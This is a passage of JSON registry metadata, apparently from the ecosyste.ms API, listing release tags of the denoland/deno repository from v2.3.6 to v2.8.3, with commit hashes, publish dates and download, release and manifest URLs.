.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH